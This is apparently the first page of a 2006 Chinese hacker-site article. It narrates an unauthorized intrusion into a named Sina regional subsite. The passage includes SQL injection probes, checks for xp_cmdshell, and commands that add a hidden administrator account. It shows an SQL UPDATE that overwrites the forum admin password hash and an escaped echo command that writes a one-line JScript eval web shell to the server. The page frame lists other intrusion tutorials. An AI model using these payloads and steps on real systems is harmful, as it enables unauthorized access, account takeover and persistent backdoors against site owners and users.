·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]入侵新浪分站服务器实战

热荐 ★★★★★

入侵新浪分站服务器实战

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-4-24 9:02:14

作者：海东青
个人论坛：http://www.dirtysea.com/

前段时间听说sohu的一个分站被人黑了我还看了，是真的。所以我也对这种门户网站动动手，我上了www.sina.com.cn, 又跑到了它的广东分站。东西太多了，找个注入点也很难，大多是html,shtml的页面。

于是我查看源文件，搜索asp. 总算找到了一个可以asp的页面，找到了一个注入点http://gzguide.gd.sina.com.cn/news/newdetail.asp?id=2807 提交单引号，
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。

/news/newdetail.asp，行 5 提交 and 1＝1 返回正常，提交and 1＝2 出错。呵呵，典型的注入漏洞。 and 1=(select%20@@VERSION) 返回结果表明是sql2000的，windows2000的服务器 and 'SA'=(SELECT%20System_user)，返回错误，看来不是sa帐号连接 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell') 返回正常，表明xp_cmdshell存在手工注入太麻烦，用nbsi吧，想到nbsi老发生意外出错，用教主的HDSI吧，它还支持php注入呢！

结果出来了，显示连接帐号为dbo,SA权限，这下好了。因为权限比较高，所以用HDSI能够直接执行系统命令，省得在浏览器里面用xp_cmdshell执行。

如图01执行ipcongfig －all命令，看了一下ip，确定sql数据库和网站是在同一台机子上。用net start命令看了一下，有诺顿，serv-u，sql，终端服务也开了。先加个帐户。 net user zuoai /add, net localgroup administrator zuoai /add 再执行net start telnet. 先连它的终端试试，这个我只抱着40％的希望。可喜的是能连上去，可是当我输入帐号和密码后出现如下提示框。

guest$虽然是管理员权限，却没有远程登陆的权限。再试试telnet，这个我只抱着20％的希望，果然，出现“正在连接到211.155.23.118...无法打开到主机的连接在端口 23 : 连接失败”，这种错误很常见，可能是由于telnet服务没有成功开启或者_blank">防火墙屏蔽了对23端口的访问，这里应该属于前面一种情况！那就试试ipc连接吧，，发生错误53，这种错误一般是自己的lanmanworkstation服务未启动或者目标删除了ipc$，这里应该属于前面一种情况。现在我关键是把木马传上去，怎么办呢？得到webshell，再上传图片，得到webshell。

用HDSI把所有的表都猜出来了，实在太多了，根本找不到管理员密码在哪个表里面。于是跨库查询，看到了一个bbs库，一个leadbbs2的库。我立刻访问http://gzguide.gd.sina.com.cn/bbs，果然是个论坛，估计是他们自己开发的(后来才知道是leadbbs). 我接着猜解bbs这个库，希望把管理员密码帐号都跑出来。

希望不是md5加密的，如果用md5加密了的话就只好用updata把密码改为自己的了. 再用HDSI猜后台地址，很快猜出来了，http://gzguide.gd.sina.com.cn/bbs/manage/default.asp 可是着个库里面还是没有重要东西。这个bbs应该对那个leadbbs2库，密码跑出来了,是md5加密的。如图02 ;update leadbbs2.dbo.leadbbs_User set pass='4621d373cade4e83' where username='admin';--,4621d373cade4e83是md5加密后的test.应试试帐号:admin,密码:test登陆却出现提示"此用户已经开启IP绑定访问，您无权使用此用户!".一阵狂晕，管理员登陆限制了ip！看来用这种办法得到webshell是不行了。

其实现在可以先找到web的绝对路径后在HDSI中用echo写个小马上去，可是用echo的时候有写字符要用"^"来转义，比如写个冰狐浪子服务端要这样写

echo ^<script RUNAT=SERVER LANGUAGE=JAVAscript^>try{eval^(Request.form^('guest'^)+''^)}catch^(e^){}^</script^> >c:\test.asp

[1] [2] [3] 下一页

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：如何通过web安全添加系统用户

下一篇文章：从后台得到webshell十大技巧大汇总

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26
BBSXP2008存在后台注射漏洞	02-19
Discuz! 6 后台拿Shell的方法	02-17